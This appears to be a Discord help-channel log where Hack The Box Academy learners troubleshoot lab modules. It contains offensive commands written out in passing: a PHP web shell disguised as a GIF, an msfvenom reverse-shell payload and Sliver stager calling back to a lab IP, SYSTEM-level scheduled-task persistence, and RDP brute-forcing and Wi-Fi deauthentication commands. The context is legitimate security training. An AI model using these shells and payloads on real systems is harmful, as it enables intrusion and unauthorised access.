#modules
i haven't thought that the flag is in the root directory, but yes, in the question it was /flag.txt
it happens xd
Go for the releases
does anyone that knows coding know how to open pdf files with a password on them? i got a lot of pdf files but i seem to have forgotten the passwords for all. i know i need john the ripper and some other stuff, if anyone knows please send a dm.
Hey all, first message here, is anyone available to help with 'the live engagement' on the Shells and Payloads Module in academy, is anyone free.
Module: https://academy.hackthebox.com/module/115/section/1139
I'm constantly getting errors that nothing in the forum has been able to help with.
The issue is with Host 2 172.16.1.12 with the exploit 50064.rb https://www.exploit-db.com/exploits/50064
i get the following in msfconsole
msf6 exploit(50064) > run
[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created.
I changed the script slightly as i noticed there was a similar section to this split error but commented out.
I then get a 404 instead and authentication failed
John has a lot of parsers
dumb question, but are the releases in the github repositories?
Yes
In the right part of the GitHub repo you will see a “Releases” link
then how can i crack it
ah, I see it. Thank you. I'll see if that works. appreciate it.
what do you have set for the OPTIONS ?
appreciate it bro
was impatient the first time so i didn't let hydra fully bruteforce
password attacks - Protected files
this module will help you
pdf2john.py PDF.pdf > pdf.hash if u just want that
Maybe you can use access from a previous question in this assessment to enumerate users with RDP access and target that user?
hey guys, so I'm a bit confused. If I install the HTB Parrot ISO and run it locally on a hypervisor (virtualbox or vmware) I don't need to play with the instances on the site right? Assuming I'll be connecting to the HTB network through the openvpn
trying to paste it it won't let me
VHOST: blog.inlanefreight.local
TARGETURI: blog.inlanefreight.local
RHOST: 172.16.1.12
USERNAME: admin
PASSWORD: admin123!@#
LPORT: 4444
yeah you can connect through open vpn, there are a couple of times here and there it can get a bit tricky with some of the targets, but i much prefer it
try unsetting TARGETURI
hahah are you serious, that's worked. But it had TARGETURI as mandatory! I didn't think it would let me run it without TARGETURI
I've been at this for hours, thank you!!
np 😉
i think we would only need it if it were trying to login to a page such as http://172.16.1.12/login . In which case, for the TARGETURI we would set it to 'login' or '/login'
Yes i did that too, i also tried reusing credentials from the winrm session, but the issue seems that rdp is just not working. Because i tried bruteforcing all users and all their accounts are inactive.
isn't it "/" by default? what does that mean?
or is it just the same as having it blank
correct
it's the first time i've seen in msfconsole where a required field can be left blank though 🤷♂️ that's what tripped me up i think
Hey CB which question is it you're stuck on? Do you have the link for what stage you're at? This seems familiar to me as I think i had the same issue, i remember trying the biggest dictionary, but it turns out one of the other dictionaries was what i needed
I'm not able to copy the files that I download on my computer to the spw machine. It's probably a stupid thing, but I can't. Does anyone have the same issue?
You can SSH / SFTP to your Pwnbox. The credentials and IP would be listed
..I think..
Yeah.. so expand your Pwnbox to full screen, you'll see the hostname in the URL, and credentials on the desktop
Thanks
That should be a bit more obvious
as in.. on the platform, but it could be it is described in an introductory module
I will try, thank you
Yup, confirmed you can SSH/SFTP
Is the Windows Fundamentals module overkill ? It's very thorough, geared more towards administration
Active Directory Enumeration & Attacks
Living Off the Land
rdping displays a blackscreen
with the console being stuck at
[16:28:11:802] [6730:6731] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[16:28:11:802] [6730:6731] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
what about rdesktop or remmina
lemme try but why would xfreerdp not work:3
iono🤷♂️
GenericWrite can be used to targeted Kerberoasting right?
Hello DACL 1 skill assessment question 3.
I changed the owner of the NETWORK ADMINS to mathew and gave him FullControl over it but when i readLAPS i don't have any results. I can't ping ws01.inlanefreight.local as well
if so, the answer in AD enum & attacks - Access Control List (ACL) Abuse Primer needs to be changed cuz it says GenericAll (which is true but only cuz GenericWrite is a subset of it) so the answer should be GenericWrite
I think those credentials only apply to traverse.jar
did someone successfully install sqsh, i see it's hell pain to install it
i don't know why all the tools that are mentioned in the entire path are not installed by default on pwnbox
Having trouble with
Password Attacks
Network Services:
Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer
Command im running is:
hydra -L username.list -P password.list rdp://10.129.141.43 -t 32
I know the answer is c** and 7** but can't get it to actually populate through hydra
I'm using the correct password
Looks like rdp on your command
What about with -windows-auth
oh shoot I'm sorry had to edit. it's the rdp one
yeah it works now, i didn't think to use windows auth
you could try netexec if hydra isn't working or lowering your threads
Hello, good night, can someone tell me the answer to this question: "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)" in the module Network enumeration with nmap???
is it a windows machine?
Ubuntu
try using -A or -sC
I have already tried to execute these commands and it always says wrong answer
dm the results
"sudo nmap -sS -sC -sV -O [IP]" like that?
Is anyone able to get the flag on the File Inclusion, LFI and File Uploads section? When I go to cat the flag file, the only output I'm seeing is GIF8 rather than the actual flag.
Tried resetting the target a few times but it yields the same result. Let me know if anyone else has the same issue.
I was doing the basic GIF payload and it does have RCE, but let me try another payload to see if it has the same problem
mine was prepended with gif8 but it still worked
i just tried again and it worked for me, are you using the right payload?
Weird. Using the GIF payload means the flag only spits out GIF8 for me, but using the ZIP payload results in me getting the actual flag, and a different file name at the root directory despite it being the same target
what command did you use to create the gif?
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
It gives remote code execution but the flag file doesn't work for some reason
ahh
Brb, OS update
i was able to do it and read the flag with the gif
look at the filename closely, did it prepend gif8 and then you included that in the filename when you catted it?
Hmm, I'll give it another shot when my laptop is done updating, I think I might've missed doing that
yeah at first it didn't work but it was because the GIF8 got tacked on to the first part of the name, after removing it, it worked fine
Yeah, I forgot to remove GIF8 from the start of the flag file name. Thanks!
Very simple mistake to make
I'm running into the same problem. How did you fix it?
zombiiieee said how they fixed it in the very next message, if that helps
Right, I saw that @eager ledge modified the invoker.java file. I did that, and I'm still getting this jumbled mess. Ugh!
Hey, I'm doing the "Information Gathering - Web Edition" Skill Assessment, but I'm unable to complete the question related to crawling inlanefreight.htb for the email address.
All of the crawlers I used on that domain and the subdomain are coming back with no results for emails found
Does anyone have an idea what I might be doing wrong?
I also haven't been able to get whois to output anything more than a "400 bad request". The command I've been using is "whois -h inlanefreight.htb:<port> <ip addr>"
Can someone help me with the Advanced Xss and CSRF exploitation module - skill assessment?
I was able to become moderator, and find a way to execute XSS (very limited though); now i'm stuck on how to exfiltrate the admin page
with mod powers you can access another page that you couldn't before
Does anyone playing battleground now
hmm, interesting...i'll try something...tks for now
can someone help me Wi-Fi Penetration Testing Basics - Skills Assessment?
after Aireplay-ng -0 -5 workstation 02:00:00:00:02:00 and even spoofing MAC as that address + 2 broadcasting addresses
(I've got ESSID and BSSID)
then try airodump-ng w/ all band (abg) , I can't get ANY handshake after an hour
after getting handshakes, I can crack pw and connect
the point is, how to get handshake when 02:00:00:00:02:00 is using all abg bands, and MAC spoofing may not work?
Are you sure you're not mixing something up? Should not take an hour, only took me a few seconds to capture the required info.
like the ssid/bssid
hey guys . so im currently doing the metasploit portion of the introduction and these ports and services came up
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
25/tcp filtered smtp
111/tcp open rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
it now wants me to search using searchsploit but when i do, the ssh type is too new/no exploits. am I missing something?
yeah, after I got ESSID (H**), I thought this assessment should be an Easy one
so I go aireplay-ng -0 -5 (but --test not work) and just airodump-ng -c 1
dm me
bump
Any help with my issue?
I modified the invoker.java file, as instructed. When I try to open fatty-server.jar, I end up with a weird jumbled mess.
That module is such a pita. I can't really offer much help beyond a lot of people watched ippsec's video on "fatty", he goes through it
Yeah, I've seen some comments about how it's poorly made. I didn't know about ippsec, I'll look them up. YouTube?
yeah. he's a legend. https://www.youtube.com/watch?v=3bvKLj0akMM
what module/section exactly
there are multiple introduction modules, multiple modules with metasploit
you're going to have to say the exact ones
that's the module "getting started" and section "public exploits"
the target that spawns has only one port, try visiting it in a web browser. the question kind of gives it away (it says it's a web server)
you're not meant to nmap scan
Awesome, thank you. I'm hoping this will help address the issue.
Ugh, I figured it out. I really hate the way they framed the questions.
"What is API key the inlanefreight.htb developers will be changing too?"
The way the question was framed made me assume the info had to be on the original domain. Kinda frustrating to do everything right, but on the wrong domain, and just assume that because of vhosting I was putting in the commands for recon spider wrong.
Maybe I'm just not cut out for pen testing. It seems like I always get something wrong and have to spend hours just because of simple little nuances like this.
ahhhh i see. okay, i will investigate.
yeah no I'm lost dude. i looked up the plugin and the exploit didn't work (probably wrong wordpress exploit)
that's all that comes up though. when i execute the exploit it just gives me a crisp high five for executing nothing lol
did you try searchsploit on the plugin
yeah, it comes up with the same exploit in searchsploit and in metasploit
did you setup all your metasploit options
yes. the only one needed was RHOSTS, I set to RHOSTS => 94.237.58.155
OH
also what file you want to read
type options and make sure you read them and have them all the required ones filled out
so the 5 digits at the end
yes
nah, when the target contains the port the module challenge is going to be specific to that port
i see. ill reattempt
they're just docker containers that get spun up publicly so they change the ip/port all the time when you spawn them
you are the best man. thank you. that took me far too long haha
a lot of nuances to take in this first week
man no lie lol
Hello guys. I need some help, I'm just starting out, and after going to forum and then Google nothing really helped. I'm at "Getting Started" Module and there is optional exercise. I managed to figure out where to get the banner, but the command is just not working.
You're trying to connect to port 22
That is not the correct port
Look at the IP provided for your instance (and port number)
Oh thanks! Now it worked
👍
Hi, I have an issue with the flag 'Wi-Fi Penetration Testing Basics' skill assessment and question 1. The question is: What is the name of the WiFi network with the BSSID D8:D6:3D:EB:29:D5?
When I enter the name of the WiFi network, I get an incorrect answer.
wifi@WiFiIntro:~$ iwlist wlan0 scan | grep 'Cell|Quality|ESSID|IEEE'
Cell 01 - Address: D8:D6:3D:EB:29:D5
Quality=70/70 Signal level=-30 dBm
ESSID:"<REDACTED>"
IE: IEEE 802.11i/WPA2 Version 1
where can i report a deadlink found in a module ?
ty
You're welcome
helen b. kellerin 
ill give you a clue 😉
Oh, my bad 🙏
Hello, i'm in the Pivoting, Tunneling, and Port Forwarding module and the RDP and SOCKS Tunneling with SocksOverRDP, i already disable the real time protection but got this error message, any hint ? ty
Hi! Anyone completed Wifi testing module?
almost finished module and skills assesment, getting some troubles while connecting to hidden network (got 2 previous flags)
Try not to connect to the network of the 1st question
You can connect to something not hidden 👀
Problem at "getting started" When I try to check the content of flag.txt by using cat/ head It says: command not found.
Download the file locally, and then try to get the contents of it
Thanks!
Did you download the x86 or x64 in the github repository releases?
Does anyone know if HTB academy will offer a sale on Cubes for blackfriday?
Hey thanks for responding
lol if it’s only a dictionary thing
That’s the question:
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
That’s where I am:
no
no they don't offer
Module: Attacking common services
Section: Attacking email services
I found password for previously found username, am i supposed to login to mail via client or i have to do something different?
anyone finished Windows Lateral Movement module Skills Assessment? RDP seems to be unstable as I was always getting disconnected from the session
I also moved laterally to another user and it seems the flag is not in the Desktop folder wtf
You should find a username, and then its password.
yeah i found both
do i need to authenticate over pop3 and then retrieve all emails?
first i bruteforced username, then password
with provided lists
Should I be using NAT or bridged mode on my VM? I seem to be having a lot of issues with stuff either constantly timing out or connection dropping etc
solved it
Anyone did the SOC -> Digital Forensics -> Evidence module?
https://academy.hackthebox.com/module/237/section/2609
did you have to make your own lab? all the tools are not on the machine... even the free/FOSS ones
did you do a gci c:\ -path . -filter *flag* -recurse or similar?
Hello, does anyone know how to get the jimmy user password in the ADCS module skill assessment? I used hashcat to burst without results, can you give me some tips
i did bro..im still on the SUPPORT host
i haven't done this module so I'm not able to be too terribly helpful, but are you expecting to find the flag in Docs or have you been informed by the lab to find it there?
just as a sanity check, yknow, sometimes they like to mix it up
it was explicitly told in the questions bro
gotcha
are you doing ADPT job role path too?
did something change with academy? now I have to login like 4 times throughout the day instead of once each day
I am having problems with a module Using CrackMapExec - Stealing Hashes.
The chisel is up and running but when i try to connect to a share on 172.16.1.5 the connection just drops.
I used a nmap scan and its saying that the host is up
proxychains4 -q nmap -sV -Pn 172.16.1.5
Nmap scan report for 172.16.1.5
Host is up.
All 1000 scanned ports on 172.16.1.5 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
hello! can someone help me with a pwn challenge?
hey guys might sound a bit silly yet can anyone elaborate the question cause i really don't understand what exactly it's asking for "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "
try with --smb-timeout 5
it just drops, not good
have you tried setting this option ?
Yes
Perhaps not in this Host
This SA was constructed to pivot from one host to another
yes, it doesn't work. I am at the beginning of the module and proxychains4 is configured from the module before, so it should be working
better to include which module/section you're on
You can use the auto-reconnect flag in xfreerdp
im doing ACL Enumeration AD
We need to configure proxychains to use the Chisel default port TCP 1080. We need to make sure to include socks5 127.0.0.1 1080 in the ProxyList section of the configuration file as follows: socks5 127.0.0.1 1080
i just dont understand what exactly the question is asking for
idk, that timeout thing usually does the trick for me; I did the CME module using ligolo-ng instead, so I can't help much with chisel
If you are using the Pwnbox with proxychains, run it with sudo
i am using my own machine but ill give it a try just in case
The section shows you how to enumerate which access rights a user has over groups, it wants you to input the access rights 'forend' has over the 'gpo management' group
In the documentation module, anyone manages to extract the example report from the archive in the resources? I'm getting an error.
Thank you 🙂
not familiar with the module you're working on but you might try a cmdlet like get-acl 'AD:\OU=Domain Controllers,Dc=contoso,DC=com' | select -exp Access | ?{$_.IdentityReference -match 'Everyone'}
or whatever is referenced in the section
i got the flag, i was using pwn box. My computer just wont do it.
i've already enumerated the user's rights i just don't get what exactly the question is asking for
It's asking for the name of the Object ACE if I'm not mistaken
I think I found an error in the Command Injection Module
On the lab under section "Identifying filters", the answer that is considered correct is actually not.
The new-line "\n" character gets rejected with invalid input in the exercise, so it can't be the correct answer; the correct answer should be "&"
Never mind. It works properly once URL encoded
Post in #1234357888114364508 if you believe there is a mistake
Aha thanks. Do they check those?
Hm you know what. They probably wanted it to be url encoded. still in that case it seems like there are 2 operators that are not blacklisted
actually no i think i jumped too quickly over here. If it's url encoded it works properly
yes they do
hey can a mod dm me for an academy vpn question?
has anyone else ever had trouble using "execute" within sliver? I'm currently doing the sliver c2 module - maintaining persistence with scheduled tasks, within a SYSTEM shell, if I run the command:
execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr "powershell.exe -enc <BASE64HERE>==" /ru SYSTEM'
It works fine, verified it in the task scheduler GUI.
However - if I try the exact same command but within the sliver session (still as SYSTEM) - the command runs, I get no output & checking the task scheduler, nothing is there.. Scratching my head on troubleshooting this one
sliver (http-beacon1) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater2 /tr "powershell.exe -enc <BASE64HERE>==" /ru SYSTEM'
Did anybody pass assessment of Whitebox attacks? I need a hint. I think that the 1st step should be to exploit type juggling with password of Larry. I’ve tried different ways to calculate magic hash (using salt), but all my vocabularies dont provide it to me.
I saw your message in the forum, couldn’t respond cause I’m at the phone
DM and I’ll send you a couple of pointers
Hello, I was scammed out of money by a fake escort who pretends to be someone else on Instagram. Can someone help me recover my Instagram account?
I also have part of his number
No one here can help you with that, you need to reach out to Instagram
Just ask him to give you the money he has left and you will help. I bet he will fall for it. 😄 😄 haha
This is not instagram support, we can't help you with that
Someone have same issue as me that I cant connect into windows RDP in Active Directory Enumeration & Attack module? I am using PwnBox and xfreerdp to connect.
Internal Password Spraying - from Windows and LLMNR/NBT-NS Poisoning - from Windows both seems not working, I have waited hour and still the same issue
if this screenshot helps a little
Put the password in quotes
/cert:ignore
oh that was the issue thanks, weird that linux works without quotes
Ooo
strange, didn't have to put the password within quotes
**Module:** Intro to C2 Operations with Sliver [Probing the Surface]
Steps I followed based on the module:
# SLIVER-CLIENT
profiles new --http 10.10.15.200:8080 --format shellcode htb
stage-listener --url tcp://10.10.15.200:4443 --profile htb
http -L 10.10.15.200 -l 8088
generate stager --lhost 10.10.15.200 --lport 4443 --format csharp --save staged.txt
# MSFVENOM
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.200 LPORT=4443 -f aspx > sliver.aspx
I copied the payload from staged.txt to sliver.aspx and uploaded via the website but no call back
Before
After
What is the problem?
Hey guys, I'm a bit stuck in the footprinting module. It's telling me to enumerate the SMTP service further and find the username, and i've tried VRFY, i've tried smtp enum in msfconsole with the provided wordlist. Am I missing a step, or what else could I do?
Was it you that DM me in the forum about the same issue?
No
Just working on it
Don’t remember having any issue
But can check when I get home
Sure thing. Thanks
smtp-user-enum tool should work - takes quite a long time
I got a list of usernames, but they were default users like root, admin etc and I entered them in anyway and they were all wrong
use the wordlist provided
I did, I used it in metasploit. Is there another way I can use it? Metasploit just gave me a banner
At least for me the tool i mentioned worked - so you can use that I guess
But somehow not mentioned in the section - kinda strange
Probably just wanted us to do research tbh
Could be...
Always was wondering how in the world it would be possible to complete the CPTS path within 43 days - but now with guided mode it could be even possible within 22 days - lol
How much longer do you have?
If you have some level of experience, and run into little to no issues it's possible
My best advice is to ignore the estimate
It's only there for businesses to get an estimate for how long it should take their employees, that's it
It doesn't take into account any skill issue, technical issue, or other extenuating circumstances
Can't even blame you, tech in general can be frustrating, I just love it lol
Marcie could you help me if you have time? It feels like i've done every step possible
Actually my goal is to just finish it for completeness - but for sure no exam
Nah
I was gonna do that, but then I learned that it's 10x harder than the OSCP so... I changed my mind
I'm going for CPTS too, had some hold ups on the way though with some of the modules in the pathway
You need to adjust the timer for smtp-user-enum
-wwwwwwwwwwwwwwww
I adjusted it to 300 seconds the second time I tried, should it be longer?
That's a long time
Also are you sure you adjusted the right thing
20-25s is what's average
This is the command I did: nmap 10.129.79.223 -p25 --script smtp-enum-users -w 300
Use the smtp-user-enum tool
Not the nmap script
Because if you use the nmap script you also need to put the variables in
The -w that you're tacking on is only for nmap, not the script being used
Ohhhhh, you're a lifesaver thank you so much
@fathom pendant do you know a rough percentage of how many pass the exam - just wondering
[*] Sliver implant stager saved to: /home/htb-ac-799850/staged.txt
[*] Session b83648a2 COMBINED_PACE - 10.129.172.70:49692 (web01) - windows/amd64 - Tue, 29 Oct 2024 15:44:23 CDT
sliver > use b83648a2-784f-4d1e-a860-635a1b506159
[*] Active session COMBINED_PACE (b83648a2-784f-4d1e-a860-635a1b506159)
sliver (COMBINED_PACE) >
Got a callback with no problem
100% of cert holders have passed
but for sure not first try
The attempt/fail rate isn't released by htb
This is scientifically proven to be correct!
Did you know 100% of people that intake Dihydrogen Monoxide eventually die
got it
HTB just doesn't release the stats ¯\_(ツ)_/¯
One could get a feeling by reading the cpts forum - lol
Eh
have you tried using dnsenum and entering the results found after the brute force?
dnsenum --enum inlanefreight.com -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -r
What are you currently trying and what results do you get
is it ok to dm you?
Sure
bro I tried to perform double RDP in an another host inside the network using non standard port and it does not even accept the password I’ve got..It says the user has no RDP rights towards that host.
I already setup pivoting and tried to look for open ports in that other host and just does not return anything
idk if the lab is broken or do I need to do some firewall bypass with nmap so I can see some ports
Try other type of Remote Service
Okay so this is the cmd I used: smtp-user-enum -M VRFY -U ./footprinting-wordlist.txt -t STMIP -m 60 -w 20 10.129.168.3 it's working just not returning any results, is there something I typed wrong?
idk man, I was trying to look for open ports and nmap just does not get through pivoting..it returned nothing thats why I am not able to know what specific port is opened on that host so I can pivot..Most likely it is using a non standard port for the other type of remote service
host unreachable?
-t is the ip...
It won't.... I had some discussion with some other users. There is a workaround to perform it but you can rely on the information in the txt file
The services should be methodically assigned to non standard ports. So if you found the service running on a specific port in a Host, it should be the same non-standard port to the other Hosts in the environment
You can use the port scan you did for the first target as a baseline
got it thank you!
Module: Sqlmap Essentials
Section: Attack Tuning
What's the contents of table flag6? (Case #6)
how can i know which prefix to use im so confused
So what's with all of the Mass IDOR Enumeration section being about a GET request when the lab is a POST request? This is frustrating that nothing matches compared to every other module before it.
cuz real world targets are using all request types
and this theme of switching is used a lot in the academy btw
Oh come on, what is this, OffSec now?
especially with skill assessments
I understand on the skills assesment, but every single module before this one walks you through it.
offsec will use trace or something stupid just to fail u the exam
I have OSCP from this year, I know the stupidity they pull. This module is reminding me of that pain of things not matching up.
https://academy.hackthebox.com/module/147/section/1315
Module I need assistance with:
Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.
I have the hashes for the users, but can't crack them; hashcat is being exhausted
What command for hashcat did you use, with which --flags
You're not supposed to use hashcat to crack the password
It says you're supposed to be using secretsdump.py on the SECURITY, SAM and SYSTEM files
Or dumping the LSA remotely, with crackmapexec/nxc.
This module looks fun
Oh damn, im back. Hashcat decided to start working so I got it 🙂
@strange pivot @indigo rune
https://academy.hackthebox.com/module/163/section/1544
stuck on the last question, I cant figure out how to use socat to get a rev shell
So no cube sale on Blackfriday?
<@&861185840277487616>
Rats. I was slow.
I was actually casually reading the message while distracted on something else until mid reading i was like: "wait a minute this is not supposed to be here" 😅
hi guys, i'm in the cracking passwords module. I need to connect to evil-winrm but i get this error
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1
any advice?
Cry
i did it 🙂
It's a weird ruby error that doesn't detect openssl
I don't think there's a fix aside from reinstalling ruby/os
Question for anyone that can answer, I work with a lot of Windows based machines and on top of learning Pentesting I would like to also be able to keep up with my coworkers on Windows, would that module be the right one to start with?
no result 😦
the starter one. then move forward if you have a path pick one use a vm
Awesome. Thank you.
i'll be honest, if you cannot handle at LEAST 2 OSes this is not the job for you
but a good vm of kali, normal windows
start with the starter stuff, keep to fundamentals and work up (they are marked)
which module are you referring to
That is the idea. Basic stuff then go from there
"Windows Fundamentals"
if you feel that you're lacking or if you want to brush up, then that's fine
if you're planning on learning pentesting then you will have to learn more than just that though
I would like to learn basics and then focus more on pen testing. And I am semi familiar with normal windows usage, but getting more into it I think will help
then you should probably complete the Information Security Foundations path then move onto the Penetration Tester path in HTB Academy
there are modules legit called "fundamentals", they start at lvl 0 type basic stuff, i'd go there first off
That is where I am currently
the Infosec Foundations path should prep you enough to start learning pentesting in the Pentester path
it's also what i did
I will start on that one tomorrow then. Thank you.
I figured the more easy things I do the better.
ya go fundamentals > easy > move on from there, my suggestion
like TwinTail said, the fundamentals are very important, so soak in as much info as you can
I have a blank notebook next to me with a few pens.
id use / suggest cherrytree
if you prefer that for notetaking then that's fine
In the bot channel?
a lot of us use Obsidian for our notes
no in kali
Its how I have learned
Gotcha
I will look into that
you can takes notes as well as tree notes (children notes of notes )
also pictures even video dropped in there so i save cheat sheets and how to's as well as "current works" or "how i did this"
I like that. I usually draw them out so that will save my hands hopefully
Thank you both
my suggestion
make a htb node
make a node for each lesson
make a node for each thing (like "how to fuzz") and add fuzz notes there but also a main node "how to do lesson xyz" would be good, the db is very small even with pictures
That is how I take notes now, so that will be helpful
i do main
child
child
lots of children per that child for each topic)
it's free, easy, comes with kali, enjoy and gl
what is the best way to ask a question about a final part of a skills test when i have to use part of but not all of the answer in my question.
i'm stuck and can't tell if i'm stupid, the box is broken, or if i am flat misunderstanding what to do.
just ask your question with the module and section name, the question you're working on, and what you have tried
you can also explain your understanding of the situation you're in
burp says it's cfide (cold fusion adobe), this is my GUESS but i have tried using every combo of msf
i tried to fuzz
i need a direction
How come the target IP won't load in web browser? ERR_ADDRESS_UNREACHABLE, ERR_CONNECTION_TIMED_OUT
Why does pinging the target IP say "Destination Host Unreachable"?
I'm connecting to target machine thru VPN...
what the msfconsole module is sending a request to is CFIDE
i tried to forward, i tried to attack with 28 attacks, nada
you need the vpn on, it's local
On its local? What does that mean?
do you not know the difference between a local and a public ip?
the ip is local so use the vpn
if i'm here and you are there i'm not local to your house, but if i use a vpn i might as well be IN your home. now i'm local so i can touch a local network
it's the same thing. with the vpn on (from the vpn file they give you) it works fine. also don't overthink it, i fooled myself making this harder than it was when i did it.
was that enough for you to give me a hint should i be doing msf ?
fuzzing ?
it kinda went from "do this fuzz proxy" to "whatever i am on now". i know it's coldfusion, just not sure where to take that info
The target IP isn't a local IP
10.129.50.247 that's a local ip bud =3
not if it's not your ip
i'd consider a local ip the ip address that's on the host you're working on
that ip is only local to a remote machine
he does not get the vpn, i'm trying to get him to use that, then it will work (tldr)
he said he was connected to the vpn
@mental tapir what are the results when you type ip a in your terminal?
cancel my question, i'm stupid
I can't show it bc it's on my laptop next to me. I don't use Discord on the Kali Linux
🤣 all this time banging my head on a wall and all they wanted was the name.
you should still be able to since the machine is connected to the Internet, however do you see an adapter with a 10.x.x.x ip?
yes, tun0, tun1, tun3, etc
something is wrong then, you should only have 1 tunnel adapter, try killall -9 openvpn and then open the vpn again, only once
ya i'm sorry @dim wolf, i posted the answer trying to ask the question but i had ZERO idea it was the answer. i deleted it.
I kept relaunching openvpn over and over thinking I had to get new keys. It went all the way to 20 adapters listed.. Should I have used CTRL+C to kill the vpn connection, not just closed the terminal?
depends on how you launched it. the command i gave you will kill all instances of it. if you use & after your command it runs in the background so closing the terminal won't kill the process.
I did ip a again and it only listed 3 adapters this time after killing the rest...
great, try your connection again
i'm gonna go lay down, i realize i just wasted 56 hours trying to answer a question i had the answer to from the first 14 min. ty for help.
OK, now it works. ty!
Wait that was premature. It's still not working. The target IP address still can't be reached... another target IP from another section in the module was working but for this one, no...
This is weird. I entered the new target IP address in the browser and it wouldn't load, then it gave me the timed out error, but then a few seconds later, it loads with the Hello world! blank html page...
Does a new VPN key have to be downloaded and loaded for each new section in the module or can the VPN key be reused from the previous section?
No, just download the VPN once. If you re-downloaded it then it'll reset the key and you'll need to respawn the target, usually after a hard refresh (CTRL+SHIFT+R)
Hi everyone, currently stuck on Advanced XSS and CSRF Exploitation skills assessment where I managed to become moderator, but I don't find the way to extract the admin.php
Try to find an exploit on the page you can now access as a moderator
When you say a page that I can now access as a moderator, do you mean a new page (and if this is the case maybe I haven't found it yet), or do you refer to a functionality that I can use now?
Hi
Hello
Ok... I am soooo stuck on the NoSQL Skills Assessment II. I know that when you enter something correct it gives one response and when it's wrong you get a different response. I just can't work out how to exploit it 😦 It has been sending me mad for ages, I even moved on to the next module to think about it but still can't work it out
hi there!
having same issue
have u solved that?
Still hoping that someone can help me with my #modules message. I don't understand why it works locally and not on the target machine.
but no connection to there so we can get a handshake
Hello, trying to do this question on Linux Privilege Escalation > Capabilities. I have changed the vim so the root file does not need a login. Not sure what the next step is to get the flag. Any tips?
this is the question:
SSH to target with username "htb-student" and password "HTB_@cademy_stdnt!"
Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer.
still stuck? dm me your payloads and what you've tried
guys
is something wrong with the wayback section from information gathering?
the iana.org part, i got the date from the footer but htb says it's wrong.
i did it recently and didn't have any problem, are you sure you are providing the date the way they show you?
and don't leave a blank space after your answer
i found a blank space before the answer :(
thanks
Y'all, i tried installing kali using live boot on a flash drive and i accidentally removed the partition of my c drive which contained windows and now it's not booting into windows
There's not much we can do about that
Gotta follow the steps in the module.
I think there are two ways to finish. There is one that is pretty straight forward if you have scanned for devices with the module's command.
anyone had issues with running kerbrute with proxychains ?
kali@kali:~/Downloads/NXC [30-10-2024 10:46]$ proxychains4 -q /opt/kerbrute/kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.15.3 jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 10/30/24 - Ronnie Flathers @ropnop
2024/10/30 10:46:59 > Using KDC(s):
2024/10/30 10:46:59 > 172.16.15.3:88
2024/10/30 10:47:09 > [!] apayne@INLANEFREIGHT.LOCAL - failed to communicate with KDC. Attempts made with UDP (error sending to a KDC: error sneding to 172.16.15.3:88: sending over UDP failed to 172.16.15.3:88: read udp 192.168.153.160:35532->172.16.15.3:88: i/o timeout) and then TCP (error in getting a TCP connection to any of the KDCs)
and similar enumeration works fine with netexec
kali@kali:~/Downloads/NXC [30-10-2024 10:41]$ proxychains4 -q nxc smb DC01.INLANEFREIGHT.LOCAL -u jsmith.txt -p whatever --kerberos | grep -v 'UNKNOWN'
SMB DC01.INLANEFREIGHT.LOCAL 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB DC01.INLANEFREIGHT.LOCAL 445 DC01 [-] INLANEFREIGHT.LOCAL\adunn:whatever KDC_ERR_PREAUTH_FAILED
How to text in general
can someone give me an IRL scenario where a user account would have DS-Replication-Get-Changes-All and is not DA?
like he is using account x and then started account y and transferred everything there?
But the gist of it is admin misconfig
I would assume account x would be deactivated then (there is a chance it isn't, but like, the DCSync attack is talked about everywhere, so this sounds like a very lil chance)
Is there a way to get a list of all the types of functions on LOLBAS? It's easy to do on GTFO bins since it's listed right at the top, but I don't know if there's such a way on LOLBAS.
hmmmmmmm
Ok, thanks for the insight
This feels like a ChatGPT question (IMO)
Just in terms of it being able to solve it for you faster than ppl on this chat
Just asked GPT and it replied saying it doesn't 
No way lmao, ima check
This is directly from chatGPt
Literally copy pasted your whole question there lol
I need help with Getting Started | Public Exploits | Try to identify the services running on the server above.
I've already spent like 2 hours on this and I don't understand how to solve it, when I scan the target IP using sudo nmap -sV -sC -p- -T5 94.237.63.215 it just gives me this:
Did you try to navigate to the ip:port given other than running nmap?
Gosh, I tried but after not loading for 5 seconds I left. You're a lifesaver, thanks
anyone available to give me a sanity check on HTTP Attacks TE.CL module's task? just wanna ask whether my assumptions are correct
ask
I'll dm to avoid spoilers here
